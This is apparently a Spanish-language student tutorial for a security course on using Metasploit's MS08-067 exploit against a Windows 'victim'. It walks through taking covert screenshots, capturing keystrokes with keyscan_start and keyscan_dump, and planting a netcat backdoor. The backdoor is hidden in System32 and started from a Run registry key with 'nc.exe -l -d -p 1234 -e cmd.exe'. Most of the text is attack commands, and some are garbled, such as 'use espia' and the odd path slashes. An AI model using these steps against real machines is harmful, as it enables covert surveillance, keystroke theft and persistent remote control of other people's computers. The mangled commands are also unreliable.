web viewmetasploit: screenshot, keylogger y backdoor. un screenshot nos permite, de manera sigilosa,...

Seguridad Informática S7KRené HoracioZambrano Montero

METASPLOIT: SCREENSHOT, KEYLOGGER Y BACKDOOR

Un screenshot nos permite, de manera sigilosa, “tomar una foto” de la acción que esté realizando el usuario, y tener conocimiento de la clase de acciones que toma mientras esta conectado a una red. Por ejemplo, si queremos saber que tipo de acciones realiza el usuario mientras esta en el Internet Explorer, podemos tomar un screenshot de su web browser sin que se dé cuenta.

Como paso general previo a todos los procedimientos para atacar, debemos considerar que la red entre maquinas ya está establecida (haciéndose los respectivos ping) y también abrir las herramientas del metasploit:

1. Digitamos la ruta: cd /pentest/exploits/framework32. Para abrir el METASPLOIT, digitamos la ruta ./msfconsole3. Se abre METASPLOIT


ATAQUE DE SCREENSHOTSe siguen los pasos detallados a continuación:

a) Digitamos la siguiente ruta: use windows/smb/ms08_067_netapib) El prompt de la consola, que antes solo decía “msf”, ahora cambiara, y debemos

escribir ahí esta ruta: set payload windows/meterpreter/reverse_tcpc) Escribimos la IP de la maquina víctima: set rhost <IP_VICTIMA>d) Escribimos la IP de la maquina atacante: set lhost <IP_ATACANTE>


e) Con estos parámetros, hacemos que Back Track lance el ataque con la instrucción exploit


a) Se mostraran una serie de líneas que nos indican que se están creando las respectivas sesiones que permiten perpetrar el respectivo ataque

b) En el nuevo prompt, que ahora dirá “meterpreter”, digitamos la instrucción psc) Se muestra una serie de códigos, junto al proceso que representan en la maquina

victima; es decir, nos permitirá ver los procesos activos de la maquina victima a los que podemos tomarles un screenshot

d) Se escribe la instrucción migrate <PUERTO>, donde PUERTO es el número de proceso de alguna tarea en Windows

e) Se espera a que se migre al respectivo puerto a la espera de la siguiente orden, y una vez realizado el proceso, se escribe la instrucción use espia.

f) La instrucción anterior empezara a hacer un sniffing sobre el puerto determinado. Para tomar el screenshot respectivo, digitamos screenshot /image.bmp

g) La imagen tomada se guardara en una ruta de Back Track, la cual por lo general es /opt/metasploit3/image.jpg.

ATAQUE DE KEYLOGGERExisten diferentes maneras de perpetrar un ataque por keylogger, sin embargo, todos los métodos recurren a la misma instrucción que copiara los caracteres escritos en cualquier aplicación. Se siguen los pasos detallados a continuación:

a) Digitamos la siguiente ruta: use windows/smb/ms08_067_netapib) El prompt del Konsole, que antes solo decía “msf”, ahora cambiara, y debemos

escribir ahí esta ruta: set payload windows/meterpreter/bind_tcp


c) Escribimos la IP de la maquina víctima: set rhost <IP_VICTIMA>d) Escribimos la IP de la maquina atacante: set lhost <IP_ATACANTE>


e) Con estos parámetros, hacemos que Back Track lance el ataque con la instrucción exploit.


f) Se mostraran una serie de líneas que nos indican que se están creando las respectivas sesiones que permiten perpetrar el respectivo ataque

g) En el nuevo prompt, que ahora dirá “meterpreter”, digitamos la instrucción psh) Se muestra una serie de códigos, junto al proceso que representan en la maquina

victima; es decir, nos permitirá ver los procesos activos de la maquina victima a los que podemos hacerles el keylogger

i) Se escribe la instrucción migrate <PUERTO>, donde PUERTO es el numero de proceso de alguna tarea en Windows

j) Se escribe la instrucción keyscan_start, la cual empezara a buscar todos los caracteres digitados en bloc de notas, procesadores de texto, cajas de texto, etc.

k) Para poder traer los resultados de el escaneo anterior, se digita la instrucción keyscan_dump, y mostrara los resultados como líneas de texto en Konsole

ATAQUE DE BACKDOORPara este ataque en especial, es necesario que se instale (desde Back Track) un archivo dentro de alguno de los directorios de la partición donde esté instalado el sistema operativo, con la finalidad de que el usuario no se percate fácilmente que su equipo puede ser accesado remotamente para cualquier propósito, es más, se necesita que el hacker altere el registro de la computadora víctima para evitar la detección del backdoor. Para efectuar este ataque, los pasos a seguir son:

a) Digitamos la siguiente ruta use exploit/windows/smb/ms08_067_netapi


b) Escribimos la IP de la máquina víctima set RHOST<IP_VICTIMA>


c) En el prompt se escribe set PAYLOAD windows/meterpreter/bind_tcp


d) Para poder ver las opciones que tiene este payload, escribimos show options.

e) Con estos parámetros, hacemos que Back Track lance el ataque con la instrucción exploit


f) Ahora, lo que haremos es subir el archivo que nos servirá de backdoor, así como especificar también la ruta en donde estará. Primero hacemos referencia al archivo: upload C://WINDOWS//System32//nc.exe, donde “nc.exe” es el archivo de backdoor. Acto seguido, sin presionar ENTER, escribimos las línea que hace referencia a la ruta: C://WINDOWS//System32//

g) Ahora procederemos a incluir el archivo de backdoor en el registro. Es importante recalcar que la línea siguiente se escribe sin dar ENTER: reg setval –h HKLM //Software//Microsoft//Windows//Current Version//Run –v Hacked –d ‘C:/Windows/System32/nc.exe –l –d –p 1234 –e cmd.exe’

h) Para que este ataque pueda funcionar adecuadamente, se debe reiniciar la máquina, acción que podemos realizar desde Back Track escribiendo la sentencia reboot

i) Salimos de las herramientas Meterpreter con la sentencia exitj) Una vez que la máquina se ha reiniciado, empezamos a controlar la máquina

víctima a través del programa backdoor. Lo primero es conectarse con la sentencia connect<IP_VICTIMA><PUERTO>

k) Una vez hecho esto, podemos empezar a abrir los procesos e instrucciones que nos permitirán controlar remotamente.

Link del video de los ataques:

http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D6P9B3Z2hF9c&h=2efb4



web viewmetasploit: screenshot, keylogger y backdoor. un screenshot nos permite, de manera sigilosa,...

Documents